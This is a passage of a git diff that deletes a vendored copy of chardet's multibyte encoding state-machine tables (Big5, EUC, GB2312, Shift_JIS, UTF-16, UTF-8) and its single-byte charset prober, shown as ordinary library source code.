4,4,4,4,4,4,4,4, # 88 - 8f - 4,4,4,4,4,4,4,4, # 90 - 97 - 4,4,4,4,4,4,4,4, # 98 - 9f - 5,5,5,5,5,5,5,5, # a0 - a7 - 5,5,5,5,5,5,5,5, # a8 - af - 5,5,5,5,5,5,5,5, # b0 - b7 - 5,5,5,5,5,5,5,5, # b8 - bf - 0,0,6,6,6,6,6,6, # c0 - c7 - 6,6,6,6,6,6,6,6, # c8 - cf - 6,6,6,6,6,6,6,6, # d0 - d7 - 6,6,6,6,6,6,6,6, # d8 - df - 7,8,8,8,8,8,8,8, # e0 - e7 - 8,8,8,8,8,9,8,8, # e8 - ef - 10,11,11,11,11,11,11,11, # f0 - f7 - 12,13,13,13,14,15,0,0) # f8 - ff - -UTF8_st = ( \ - eError,eStart,eError,eError,eError,eError, 12, 10,#00-07 - 9, 11, 8, 7, 6, 5, 4, 3,#08-0f - eError,eError,eError,eError,eError,eError,eError,eError,#10-17 - eError,eError,eError,eError,eError,eError,eError,eError,#18-1f - eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,#20-27 - eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,#28-2f - eError,eError, 5, 5, 5, 5,eError,eError,#30-37 - eError,eError,eError,eError,eError,eError,eError,eError,#38-3f - eError,eError,eError, 5, 5, 5,eError,eError,#40-47 - eError,eError,eError,eError,eError,eError,eError,eError,#48-4f - eError,eError, 7, 7, 7, 7,eError,eError,#50-57 - eError,eError,eError,eError,eError,eError,eError,eError,#58-5f - eError,eError,eError,eError, 7, 7,eError,eError,#60-67 - eError,eError,eError,eError,eError,eError,eError,eError,#68-6f - eError,eError, 9, 9, 9, 9,eError,eError,#70-77 - eError,eError,eError,eError,eError,eError,eError,eError,#78-7f - eError,eError,eError,eError,eError, 9,eError,eError,#80-87 - eError,eError,eError,eError,eError,eError,eError,eError,#88-8f - eError,eError, 12, 12, 12, 12,eError,eError,#90-97 - eError,eError,eError,eError,eError,eError,eError,eError,#98-9f - eError,eError,eError,eError,eError, 12,eError,eError,#a0-a7 - eError,eError,eError,eError,eError,eError,eError,eError,#a8-af - eError,eError, 12, 12, 12,eError,eError,eError,#b0-b7 - eError,eError,eError,eError,eError,eError,eError,eError,#b8-bf - eError,eError,eStart,eStart,eStart,eStart,eError,eError,#c0-c7 - eError,eError,eError,eError,eError,eError,eError,eError)#c8-cf - -UTF8CharLenTable = (0, 1, 0, 0, 0, 0, 2, 3, 3, 3, 4, 4, 5, 5, 6, 6) - -UTF8SMModel = {'classTable': UTF8_cls, - 'classFactor': 16, - 'stateTable': UTF8_st, - 'charLenTable': UTF8CharLenTable, - 'name': 'UTF-8'} diff --git a/chardet/chardet/mbcssm.py.bak b/chardet/chardet/mbcssm.py.bak deleted file mode 100644 index e46c1ff..0000000 --- a/chardet/chardet/mbcssm.py.bak +++ /dev/null @@ -1,514 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is mozilla.org code. -# -# The Initial Developer of the Original Code is -# Netscape Communications Corporation. -# Portions created by the Initial Developer are Copyright (C) 1998 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -from constants import eStart, eError, eItsMe - -# BIG5 - -BIG5_cls = ( \ - 1,1,1,1,1,1,1,1, # 00 - 07 #allow 0x00 as legal value - 1,1,1,1,1,1,0,0, # 08 - 0f - 1,1,1,1,1,1,1,1, # 10 - 17 - 1,1,1,0,1,1,1,1, # 18 - 1f - 1,1,1,1,1,1,1,1, # 20 - 27 - 1,1,1,1,1,1,1,1, # 28 - 2f - 1,1,1,1,1,1,1,1, # 30 - 37 - 1,1,1,1,1,1,1,1, # 38 - 3f - 2,2,2,2,2,2,2,2, # 40 - 47 - 2,2,2,2,2,2,2,2, # 48 - 4f - 2,2,2,2,2,2,2,2, # 50 - 57 - 2,2,2,2,2,2,2,2, # 58 - 5f - 2,2,2,2,2,2,2,2, # 60 - 67 - 2,2,2,2,2,2,2,2, # 68 - 6f - 2,2,2,2,2,2,2,2, # 70 - 77 - 2,2,2,2,2,2,2,1, # 78 - 7f - 4,4,4,4,4,4,4,4, # 80 - 87 - 4,4,4,4,4,4,4,4, # 88 - 8f - 4,4,4,4,4,4,4,4, # 90 - 97 - 4,4,4,4,4,4,4,4, # 98 - 9f - 4,3,3,3,3,3,3,3, # a0 - a7 - 3,3,3,3,3,3,3,3, # a8 - af - 3,3,3,3,3,3,3,3, # b0 - b7 - 3,3,3,3,3,3,3,3, # b8 - bf - 3,3,3,3,3,3,3,3, # c0 - c7 - 3,3,3,3,3,3,3,3, # c8 - cf - 3,3,3,3,3,3,3,3, # d0 - d7 - 3,3,3,3,3,3,3,3, # d8 - df - 3,3,3,3,3,3,3,3, # e0 - e7 - 3,3,3,3,3,3,3,3, # e8 - ef - 3,3,3,3,3,3,3,3, # f0 - f7 - 3,3,3,3,3,3,3,0) # f8 - ff - -BIG5_st = ( \ - eError,eStart,eStart, 3,eError,eError,eError,eError,#00-07 - eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eError,#08-0f - eError,eStart,eStart,eStart,eStart,eStart,eStart,eStart)#10-17 - -Big5CharLenTable = (0, 1, 1, 2, 0) - -Big5SMModel = {'classTable': BIG5_cls, - 'classFactor': 5, - 'stateTable': BIG5_st, - 'charLenTable': Big5CharLenTable, - 'name': 'Big5'} - -# EUC-JP - -EUCJP_cls = ( \ - 4,4,4,4,4,4,4,4, # 00 - 07 - 4,4,4,4,4,4,5,5, # 08 - 0f - 4,4,4,4,4,4,4,4, # 10 - 17 - 4,4,4,5,4,4,4,4, # 18 - 1f - 4,4,4,4,4,4,4,4, # 20 - 27 - 4,4,4,4,4,4,4,4, # 28 - 2f - 4,4,4,4,4,4,4,4, # 30 - 37 - 4,4,4,4,4,4,4,4, # 38 - 3f - 4,4,4,4,4,4,4,4, # 40 - 47 - 4,4,4,4,4,4,4,4, # 48 - 4f - 4,4,4,4,4,4,4,4, # 50 - 57 - 4,4,4,4,4,4,4,4, # 58 - 5f - 4,4,4,4,4,4,4,4, # 60 - 67 - 4,4,4,4,4,4,4,4, # 68 - 6f - 4,4,4,4,4,4,4,4, # 70 - 77 - 4,4,4,4,4,4,4,4, # 78 - 7f - 5,5,5,5,5,5,5,5, # 80 - 87 - 5,5,5,5,5,5,1,3, # 88 - 8f - 5,5,5,5,5,5,5,5, # 90 - 97 - 5,5,5,5,5,5,5,5, # 98 - 9f - 5,2,2,2,2,2,2,2, # a0 - a7 - 2,2,2,2,2,2,2,2, # a8 - af - 2,2,2,2,2,2,2,2, # b0 - b7 - 2,2,2,2,2,2,2,2, # b8 - bf - 2,2,2,2,2,2,2,2, # c0 - c7 - 2,2,2,2,2,2,2,2, # c8 - cf - 2,2,2,2,2,2,2,2, # d0 - d7 - 2,2,2,2,2,2,2,2, # d8 - df - 0,0,0,0,0,0,0,0, # e0 - e7 - 0,0,0,0,0,0,0,0, # e8 - ef - 0,0,0,0,0,0,0,0, # f0 - f7 - 0,0,0,0,0,0,0,5) # f8 - ff - -EUCJP_st = ( \ - 3, 4, 3, 5,eStart,eError,eError,eError,#00-07 - eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,#08-0f - eItsMe,eItsMe,eStart,eError,eStart,eError,eError,eError,#10-17 - eError,eError,eStart,eError,eError,eError, 3,eError,#18-1f - 3,eError,eError,eError,eStart,eStart,eStart,eStart)#20-27 - -EUCJPCharLenTable = (2, 2, 2, 3, 1, 0) - -EUCJPSMModel = {'classTable': EUCJP_cls, - 'classFactor': 6, - 'stateTable': EUCJP_st, - 'charLenTable': EUCJPCharLenTable, - 'name': 'EUC-JP'} - -# EUC-KR - -EUCKR_cls = ( \ - 1,1,1,1,1,1,1,1, # 00 - 07 - 1,1,1,1,1,1,0,0, # 08 - 0f - 1,1,1,1,1,1,1,1, # 10 - 17 - 1,1,1,0,1,1,1,1, # 18 - 1f - 1,1,1,1,1,1,1,1, # 20 - 27 - 1,1,1,1,1,1,1,1, # 28 - 2f - 1,1,1,1,1,1,1,1, # 30 - 37 - 1,1,1,1,1,1,1,1, # 38 - 3f - 1,1,1,1,1,1,1,1, # 40 - 47 - 1,1,1,1,1,1,1,1, # 48 - 4f - 1,1,1,1,1,1,1,1, # 50 - 57 - 1,1,1,1,1,1,1,1, # 58 - 5f - 1,1,1,1,1,1,1,1, # 60 - 67 - 1,1,1,1,1,1,1,1, # 68 - 6f - 1,1,1,1,1,1,1,1, # 70 - 77 - 1,1,1,1,1,1,1,1, # 78 - 7f - 0,0,0,0,0,0,0,0, # 80 - 87 - 0,0,0,0,0,0,0,0, # 88 - 8f - 0,0,0,0,0,0,0,0, # 90 - 97 - 0,0,0,0,0,0,0,0, # 98 - 9f - 0,2,2,2,2,2,2,2, # a0 - a7 - 2,2,2,2,2,3,3,3, # a8 - af - 2,2,2,2,2,2,2,2, # b0 - b7 - 2,2,2,2,2,2,2,2, # b8 - bf - 2,2,2,2,2,2,2,2, # c0 - c7 - 2,3,2,2,2,2,2,2, # c8 - cf - 2,2,2,2,2,2,2,2, # d0 - d7 - 2,2,2,2,2,2,2,2, # d8 - df - 2,2,2,2,2,2,2,2, # e0 - e7 - 2,2,2,2,2,2,2,2, # e8 - ef - 2,2,2,2,2,2,2,2, # f0 - f7 - 2,2,2,2,2,2,2,0) # f8 - ff - -EUCKR_st = ( - eError,eStart, 3,eError,eError,eError,eError,eError,#00-07 - eItsMe,eItsMe,eItsMe,eItsMe,eError,eError,eStart,eStart)#08-0f - -EUCKRCharLenTable = (0, 1, 2, 0) - -EUCKRSMModel = {'classTable': EUCKR_cls, - 'classFactor': 4, - 'stateTable': EUCKR_st, - 'charLenTable': EUCKRCharLenTable, - 'name': 'EUC-KR'} - -# EUC-TW - -EUCTW_cls = ( \ - 2,2,2,2,2,2,2,2, # 00 - 07 - 2,2,2,2,2,2,0,0, # 08 - 0f - 2,2,2,2,2,2,2,2, # 10 - 17 - 2,2,2,0,2,2,2,2, # 18 - 1f - 2,2,2,2,2,2,2,2, # 20 - 27 - 2,2,2,2,2,2,2,2, # 28 - 2f - 2,2,2,2,2,2,2,2, # 30 - 37 - 2,2,2,2,2,2,2,2, # 38 - 3f - 2,2,2,2,2,2,2,2, # 40 - 47 - 2,2,2,2,2,2,2,2, # 48 - 4f - 2,2,2,2,2,2,2,2, # 50 - 57 - 2,2,2,2,2,2,2,2, # 58 - 5f - 2,2,2,2,2,2,2,2, # 60 - 67 - 2,2,2,2,2,2,2,2, # 68 - 6f - 2,2,2,2,2,2,2,2, # 70 - 77 - 2,2,2,2,2,2,2,2, # 78 - 7f - 0,0,0,0,0,0,0,0, # 80 - 87 - 0,0,0,0,0,0,6,0, # 88 - 8f - 0,0,0,0,0,0,0,0, # 90 - 97 - 0,0,0,0,0,0,0,0, # 98 - 9f - 0,3,4,4,4,4,4,4, # a0 - a7 - 5,5,1,1,1,1,1,1, # a8 - af - 1,1,1,1,1,1,1,1, # b0 - b7 - 1,1,1,1,1,1,1,1, # b8 - bf - 1,1,3,1,3,3,3,3, # c0 - c7 - 3,3,3,3,3,3,3,3, # c8 - cf - 3,3,3,3,3,3,3,3, # d0 - d7 - 3,3,3,3,3,3,3,3, # d8 - df - 3,3,3,3,3,3,3,3, # e0 - e7 - 3,3,3,3,3,3,3,3, # e8 - ef - 3,3,3,3,3,3,3,3, # f0 - f7 - 3,3,3,3,3,3,3,0) # f8 - ff - -EUCTW_st = ( \ - eError,eError,eStart, 3, 3, 3, 4,eError,#00-07 - eError,eError,eError,eError,eError,eError,eItsMe,eItsMe,#08-0f - eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eError,eStart,eError,#10-17 - eStart,eStart,eStart,eError,eError,eError,eError,eError,#18-1f - 5,eError,eError,eError,eStart,eError,eStart,eStart,#20-27 - eStart,eError,eStart,eStart,eStart,eStart,eStart,eStart)#28-2f - -EUCTWCharLenTable = (0, 0, 1, 2, 2, 2, 3) - -EUCTWSMModel = {'classTable': EUCTW_cls, - 'classFactor': 7, - 'stateTable': EUCTW_st, - 'charLenTable': EUCTWCharLenTable, - 'name': 'x-euc-tw'} - -# GB2312 - -GB2312_cls = ( \ - 1,1,1,1,1,1,1,1, # 00 - 07 - 1,1,1,1,1,1,0,0, # 08 - 0f - 1,1,1,1,1,1,1,1, # 10 - 17 - 1,1,1,0,1,1,1,1, # 18 - 1f - 1,1,1,1,1,1,1,1, # 20 - 27 - 1,1,1,1,1,1,1,1, # 28 - 2f - 3,3,3,3,3,3,3,3, # 30 - 37 - 3,3,1,1,1,1,1,1, # 38 - 3f - 2,2,2,2,2,2,2,2, # 40 - 47 - 2,2,2,2,2,2,2,2, # 48 - 4f - 2,2,2,2,2,2,2,2, # 50 - 57 - 2,2,2,2,2,2,2,2, # 58 - 5f - 2,2,2,2,2,2,2,2, # 60 - 67 - 2,2,2,2,2,2,2,2, # 68 - 6f - 2,2,2,2,2,2,2,2, # 70 - 77 - 2,2,2,2,2,2,2,4, # 78 - 7f - 5,6,6,6,6,6,6,6, # 80 - 87 - 6,6,6,6,6,6,6,6, # 88 - 8f - 6,6,6,6,6,6,6,6, # 90 - 97 - 6,6,6,6,6,6,6,6, # 98 - 9f - 6,6,6,6,6,6,6,6, # a0 - a7 - 6,6,6,6,6,6,6,6, # a8 - af - 6,6,6,6,6,6,6,6, # b0 - b7 - 6,6,6,6,6,6,6,6, # b8 - bf - 6,6,6,6,6,6,6,6, # c0 - c7 - 6,6,6,6,6,6,6,6, # c8 - cf - 6,6,6,6,6,6,6,6, # d0 - d7 - 6,6,6,6,6,6,6,6, # d8 - df - 6,6,6,6,6,6,6,6, # e0 - e7 - 6,6,6,6,6,6,6,6, # e8 - ef - 6,6,6,6,6,6,6,6, # f0 - f7 - 6,6,6,6,6,6,6,0) # f8 - ff - -GB2312_st = ( \ - eError,eStart,eStart,eStart,eStart,eStart, 3,eError,#00-07 - eError,eError,eError,eError,eError,eError,eItsMe,eItsMe,#08-0f - eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eError,eError,eStart,#10-17 - 4,eError,eStart,eStart,eError,eError,eError,eError,#18-1f - eError,eError, 5,eError,eError,eError,eItsMe,eError,#20-27 - eError,eError,eStart,eStart,eStart,eStart,eStart,eStart)#28-2f - -# To be accurate, the length of class 6 can be either 2 or 4. -# But it is not necessary to discriminate between the two since -# it is used for frequency analysis only, and we are validing -# each code range there as well. So it is safe to set it to be -# 2 here. -GB2312CharLenTable = (0, 1, 1, 1, 1, 1, 2) - -GB2312SMModel = {'classTable': GB2312_cls, - 'classFactor': 7, - 'stateTable': GB2312_st, - 'charLenTable': GB2312CharLenTable, - 'name': 'GB2312'} - -# Shift_JIS - -SJIS_cls = ( \ - 1,1,1,1,1,1,1,1, # 00 - 07 - 1,1,1,1,1,1,0,0, # 08 - 0f - 1,1,1,1,1,1,1,1, # 10 - 17 - 1,1,1,0,1,1,1,1, # 18 - 1f - 1,1,1,1,1,1,1,1, # 20 - 27 - 1,1,1,1,1,1,1,1, # 28 - 2f - 1,1,1,1,1,1,1,1, # 30 - 37 - 1,1,1,1,1,1,1,1, # 38 - 3f - 2,2,2,2,2,2,2,2, # 40 - 47 - 2,2,2,2,2,2,2,2, # 48 - 4f - 2,2,2,2,2,2,2,2, # 50 - 57 - 2,2,2,2,2,2,2,2, # 58 - 5f - 2,2,2,2,2,2,2,2, # 60 - 67 - 2,2,2,2,2,2,2,2, # 68 - 6f - 2,2,2,2,2,2,2,2, # 70 - 77 - 2,2,2,2,2,2,2,1, # 78 - 7f - 3,3,3,3,3,3,3,3, # 80 - 87 - 3,3,3,3,3,3,3,3, # 88 - 8f - 3,3,3,3,3,3,3,3, # 90 - 97 - 3,3,3,3,3,3,3,3, # 98 - 9f - #0xa0 is illegal in sjis encoding, but some pages does - #contain such byte. We need to be more error forgiven. - 2,2,2,2,2,2,2,2, # a0 - a7 - 2,2,2,2,2,2,2,2, # a8 - af - 2,2,2,2,2,2,2,2, # b0 - b7 - 2,2,2,2,2,2,2,2, # b8 - bf - 2,2,2,2,2,2,2,2, # c0 - c7 - 2,2,2,2,2,2,2,2, # c8 - cf - 2,2,2,2,2,2,2,2, # d0 - d7 - 2,2,2,2,2,2,2,2, # d8 - df - 3,3,3,3,3,3,3,3, # e0 - e7 - 3,3,3,3,3,4,4,4, # e8 - ef - 4,4,4,4,4,4,4,4, # f0 - f7 - 4,4,4,4,4,0,0,0) # f8 - ff - -SJIS_st = ( \ - eError,eStart,eStart, 3,eError,eError,eError,eError,#00-07 - eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,#08-0f - eItsMe,eItsMe,eError,eError,eStart,eStart,eStart,eStart)#10-17 - -SJISCharLenTable = (0, 1, 1, 2, 0, 0) - -SJISSMModel = {'classTable': SJIS_cls, - 'classFactor': 6, - 'stateTable': SJIS_st, - 'charLenTable': SJISCharLenTable, - 'name': 'Shift_JIS'} - -# UCS2-BE - -UCS2BE_cls = ( \ - 0,0,0,0,0,0,0,0, # 00 - 07 - 0,0,1,0,0,2,0,0, # 08 - 0f - 0,0,0,0,0,0,0,0, # 10 - 17 - 0,0,0,3,0,0,0,0, # 18 - 1f - 0,0,0,0,0,0,0,0, # 20 - 27 - 0,3,3,3,3,3,0,0, # 28 - 2f - 0,0,0,0,0,0,0,0, # 30 - 37 - 0,0,0,0,0,0,0,0, # 38 - 3f - 0,0,0,0,0,0,0,0, # 40 - 47 - 0,0,0,0,0,0,0,0, # 48 - 4f - 0,0,0,0,0,0,0,0, # 50 - 57 - 0,0,0,0,0,0,0,0, # 58 - 5f - 0,0,0,0,0,0,0,0, # 60 - 67 - 0,0,0,0,0,0,0,0, # 68 - 6f - 0,0,0,0,0,0,0,0, # 70 - 77 - 0,0,0,0,0,0,0,0, # 78 - 7f - 0,0,0,0,0,0,0,0, # 80 - 87 - 0,0,0,0,0,0,0,0, # 88 - 8f - 0,0,0,0,0,0,0,0, # 90 - 97 - 0,0,0,0,0,0,0,0, # 98 - 9f - 0,0,0,0,0,0,0,0, # a0 - a7 - 0,0,0,0,0,0,0,0, # a8 - af - 0,0,0,0,0,0,0,0, # b0 - b7 - 0,0,0,0,0,0,0,0, # b8 - bf - 0,0,0,0,0,0,0,0, # c0 - c7 - 0,0,0,0,0,0,0,0, # c8 - cf - 0,0,0,0,0,0,0,0, # d0 - d7 - 0,0,0,0,0,0,0,0, # d8 - df - 0,0,0,0,0,0,0,0, # e0 - e7 - 0,0,0,0,0,0,0,0, # e8 - ef - 0,0,0,0,0,0,0,0, # f0 - f7 - 0,0,0,0,0,0,4,5) # f8 - ff - -UCS2BE_st = ( \ - 5, 7, 7,eError, 4, 3,eError,eError,#00-07 - eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,#08-0f - eItsMe,eItsMe, 6, 6, 6, 6,eError,eError,#10-17 - 6, 6, 6, 6, 6,eItsMe, 6, 6,#18-1f - 6, 6, 6, 6, 5, 7, 7,eError,#20-27 - 5, 8, 6, 6,eError, 6, 6, 6,#28-2f - 6, 6, 6, 6,eError,eError,eStart,eStart)#30-37 - -UCS2BECharLenTable = (2, 2, 2, 0, 2, 2) - -UCS2BESMModel = {'classTable': UCS2BE_cls, - 'classFactor': 6, - 'stateTable': UCS2BE_st, - 'charLenTable': UCS2BECharLenTable, - 'name': 'UTF-16BE'} - -# UCS2-LE - -UCS2LE_cls = ( \ - 0,0,0,0,0,0,0,0, # 00 - 07 - 0,0,1,0,0,2,0,0, # 08 - 0f - 0,0,0,0,0,0,0,0, # 10 - 17 - 0,0,0,3,0,0,0,0, # 18 - 1f - 0,0,0,0,0,0,0,0, # 20 - 27 - 0,3,3,3,3,3,0,0, # 28 - 2f - 0,0,0,0,0,0,0,0, # 30 - 37 - 0,0,0,0,0,0,0,0, # 38 - 3f - 0,0,0,0,0,0,0,0, # 40 - 47 - 0,0,0,0,0,0,0,0, # 48 - 4f - 0,0,0,0,0,0,0,0, # 50 - 57 - 0,0,0,0,0,0,0,0, # 58 - 5f - 0,0,0,0,0,0,0,0, # 60 - 67 - 0,0,0,0,0,0,0,0, # 68 - 6f - 0,0,0,0,0,0,0,0, # 70 - 77 - 0,0,0,0,0,0,0,0, # 78 - 7f - 0,0,0,0,0,0,0,0, # 80 - 87 - 0,0,0,0,0,0,0,0, # 88 - 8f - 0,0,0,0,0,0,0,0, # 90 - 97 - 0,0,0,0,0,0,0,0, # 98 - 9f - 0,0,0,0,0,0,0,0, # a0 - a7 - 0,0,0,0,0,0,0,0, # a8 - af - 0,0,0,0,0,0,0,0, # b0 - b7 - 0,0,0,0,0,0,0,0, # b8 - bf - 0,0,0,0,0,0,0,0, # c0 - c7 - 0,0,0,0,0,0,0,0, # c8 - cf - 0,0,0,0,0,0,0,0, # d0 - d7 - 0,0,0,0,0,0,0,0, # d8 - df - 0,0,0,0,0,0,0,0, # e0 - e7 - 0,0,0,0,0,0,0,0, # e8 - ef - 0,0,0,0,0,0,0,0, # f0 - f7 - 0,0,0,0,0,0,4,5) # f8 - ff - -UCS2LE_st = ( \ - 6, 6, 7, 6, 4, 3,eError,eError,#00-07 - eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,#08-0f - eItsMe,eItsMe, 5, 5, 5,eError,eItsMe,eError,#10-17 - 5, 5, 5,eError, 5,eError, 6, 6,#18-1f - 7, 6, 8, 8, 5, 5, 5,eError,#20-27 - 5, 5, 5,eError,eError,eError, 5, 5,#28-2f - 5, 5, 5,eError, 5,eError,eStart,eStart)#30-37 - -UCS2LECharLenTable = (2, 2, 2, 2, 2, 2) - -UCS2LESMModel = {'classTable': UCS2LE_cls, - 'classFactor': 6, - 'stateTable': UCS2LE_st, - 'charLenTable': UCS2LECharLenTable, - 'name': 'UTF-16LE'} - -# UTF-8 - -UTF8_cls = ( \ - 1,1,1,1,1,1,1,1, # 00 - 07 #allow 0x00 as a legal value - 1,1,1,1,1,1,0,0, # 08 - 0f - 1,1,1,1,1,1,1,1, # 10 - 17 - 1,1,1,0,1,1,1,1, # 18 - 1f - 1,1,1,1,1,1,1,1, # 20 - 27 - 1,1,1,1,1,1,1,1, # 28 - 2f - 1,1,1,1,1,1,1,1, # 30 - 37 - 1,1,1,1,1,1,1,1, # 38 - 3f - 1,1,1,1,1,1,1,1, # 40 - 47 - 1,1,1,1,1,1,1,1, # 48 - 4f - 1,1,1,1,1,1,1,1, # 50 - 57 - 1,1,1,1,1,1,1,1, # 58 - 5f - 1,1,1,1,1,1,1,1, # 60 - 67 - 1,1,1,1,1,1,1,1, # 68 - 6f - 1,1,1,1,1,1,1,1, # 70 - 77 - 1,1,1,1,1,1,1,1, # 78 - 7f - 2,2,2,2,3,3,3,3, # 80 - 87 - 4,4,4,4,4,4,4,4, # 88 - 8f - 4,4,4,4,4,4,4,4, # 90 - 97 - 4,4,4,4,4,4,4,4, # 98 - 9f - 5,5,5,5,5,5,5,5, # a0 - a7 - 5,5,5,5,5,5,5,5, # a8 - af - 5,5,5,5,5,5,5,5, # b0 - b7 - 5,5,5,5,5,5,5,5, # b8 - bf - 0,0,6,6,6,6,6,6, # c0 - c7 - 6,6,6,6,6,6,6,6, # c8 - cf - 6,6,6,6,6,6,6,6, # d0 - d7 - 6,6,6,6,6,6,6,6, # d8 - df - 7,8,8,8,8,8,8,8, # e0 - e7 - 8,8,8,8,8,9,8,8, # e8 - ef - 10,11,11,11,11,11,11,11, # f0 - f7 - 12,13,13,13,14,15,0,0) # f8 - ff - -UTF8_st = ( \ - eError,eStart,eError,eError,eError,eError, 12, 10,#00-07 - 9, 11, 8, 7, 6, 5, 4, 3,#08-0f - eError,eError,eError,eError,eError,eError,eError,eError,#10-17 - eError,eError,eError,eError,eError,eError,eError,eError,#18-1f - eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,#20-27 - eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,#28-2f - eError,eError, 5, 5, 5, 5,eError,eError,#30-37 - eError,eError,eError,eError,eError,eError,eError,eError,#38-3f - eError,eError,eError, 5, 5, 5,eError,eError,#40-47 - eError,eError,eError,eError,eError,eError,eError,eError,#48-4f - eError,eError, 7, 7, 7, 7,eError,eError,#50-57 - eError,eError,eError,eError,eError,eError,eError,eError,#58-5f - eError,eError,eError,eError, 7, 7,eError,eError,#60-67 - eError,eError,eError,eError,eError,eError,eError,eError,#68-6f - eError,eError, 9, 9, 9, 9,eError,eError,#70-77 - eError,eError,eError,eError,eError,eError,eError,eError,#78-7f - eError,eError,eError,eError,eError, 9,eError,eError,#80-87 - eError,eError,eError,eError,eError,eError,eError,eError,#88-8f - eError,eError, 12, 12, 12, 12,eError,eError,#90-97 - eError,eError,eError,eError,eError,eError,eError,eError,#98-9f - eError,eError,eError,eError,eError, 12,eError,eError,#a0-a7 - eError,eError,eError,eError,eError,eError,eError,eError,#a8-af - eError,eError, 12, 12, 12,eError,eError,eError,#b0-b7 - eError,eError,eError,eError,eError,eError,eError,eError,#b8-bf - eError,eError,eStart,eStart,eStart,eStart,eError,eError,#c0-c7 - eError,eError,eError,eError,eError,eError,eError,eError)#c8-cf - -UTF8CharLenTable = (0, 1, 0, 0, 0, 0, 2, 3, 3, 3, 4, 4, 5, 5, 6, 6) - -UTF8SMModel = {'classTable': UTF8_cls, - 'classFactor': 16, - 'stateTable': UTF8_st, - 'charLenTable': UTF8CharLenTable, - 'name': 'UTF-8'} diff --git a/chardet/chardet/mbcssm.pyc b/chardet/chardet/mbcssm.pyc deleted file mode 100644 index b04c2da..0000000 Binary files a/chardet/chardet/mbcssm.pyc and /dev/null differ diff --git a/chardet/chardet/sbcharsetprober.py b/chardet/chardet/sbcharsetprober.py deleted file mode 100644 index 1866090..0000000 --- a/chardet/chardet/sbcharsetprober.py +++ /dev/null @@ -1,107 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is Mozilla Universal charset detector code. -# -# The Initial Developer of the Original Code is -# Netscape Communications Corporation. -# Portions created by the Initial Developer are Copyright (C) 2001 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# Shy Shalom - original C code -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -from . import constants -import sys -from .charsetprober import CharSetProber - -SAMPLE_SIZE = 64 -SB_ENOUGH_REL_THRESHOLD = 1024 -POSITIVE_SHORTCUT_THRESHOLD = 0.95 -NEGATIVE_SHORTCUT_THRESHOLD = 0.05 -SYMBOL_CAT_ORDER = 250 -NUMBER_OF_SEQ_CAT = 4 -POSITIVE_CAT = NUMBER_OF_SEQ_CAT - 1 -#NEGATIVE_CAT = 0 - -class SingleByteCharSetProber(CharSetProber): - def __init__(self, model, reversed=False, nameProber=None): - CharSetProber.__init__(self) - self._mModel = model - self._mReversed = reversed # TRUE if we need to reverse every pair in the model lookup - self._mNameProber = nameProber # Optional auxiliary prober for name decision - self.reset() - - def reset(self): - CharSetProber.reset(self) - self._mLastOrder = 255 # char order of last character - self._mSeqCounters = [0] * NUMBER_OF_SEQ_CAT - self._mTotalSeqs = 0 - self._mTotalChar = 0 - self._mFreqChar = 0 # characters that fall in our sampling range - - def get_charset_name(self): - if self._mNameProber: - return self._mNameProber.get_charset_name() - else: - return self._mModel['charsetName'] - - def feed(self, aBuf): - if not self._mModel['keepEnglishLetter']: - aBuf = self.filter_without_english_letters(aBuf) - aLen = len(aBuf) - if not aLen: - return self.get_state() - for c in aBuf: - order = self._mModel['charToOrderMap'][c] - if order < SYMBOL_CAT_ORDER: - self._mTotalChar += 1 - if order < SAMPLE_SIZE: - self._mFreqChar += 1 - if self._mLastOrder < SAMPLE_SIZE: - self._mTotalSeqs += 1 - if not self._mReversed: - self._mSeqCounters[self._mModel['precedenceMatrix'][(self._mLastOrder * SAMPLE_SIZE) + order]] += 1 - else: # reverse the order of the letters in the lookup - self._mSeqCounters[self._mModel['precedenceMatrix'][(order * SAMPLE_SIZE) + self._mLastOrder]] += 1 - self._mLastOrder = order - - if self.get_state() == constants.eDetecting: - if self._mTotalSeqs > SB_ENOUGH_REL_THRESHOLD: - cf = self.get_confidence() - if cf > POSITIVE_SHORTCUT_THRESHOLD: - if constants._debug: - sys.stderr.write('%s confidence = %s, we have a winner\n' % (self._mModel['charsetName'], cf)) - self._mState = constants.eFoundIt - elif cf < NEGATIVE_SHORTCUT_THRESHOLD: - if constants._debug: - sys.stderr.write('%s confidence = %s, below negative shortcut threshhold %s\n' % (self._mModel['charsetName'], cf, 